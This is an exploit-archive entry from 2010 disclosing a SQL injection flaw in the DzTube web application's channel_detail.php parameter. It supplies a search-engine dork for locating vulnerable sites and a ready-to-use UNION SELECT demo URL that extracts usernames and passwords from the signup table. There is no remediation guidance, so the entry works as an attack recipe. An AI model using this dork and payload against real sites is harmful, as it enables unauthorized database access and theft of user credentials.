DzTube SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DzTube SQL Injection Vulnerability
# Published : 2010-12-29
# Author : errnick qwe
# Previous Title : PHP-AddressBook v6.2.4 (group.php) SQL Injection Vulnerability
# Next Title : YourTube v1.0 CSRF Vulnerability (Add User)

Title: DzTube SQL Injection Vulnerability
Discovered: ErrNick
Site: xaknet.ru
Date: 28/12/2010
Vendor: n/a
d0rK: inurl:"channel_detail.php?chid="

Exploit: host.com/channel_detail.php?chid=[SQL]

Demo:
http://site/channel_detail.php?chid=-51+union+select+1,username,pwd,4,5,6,7,8,9,0,1,2,3,4,5,6+from+signup


Greatz: to xaknet.ru vulnes.com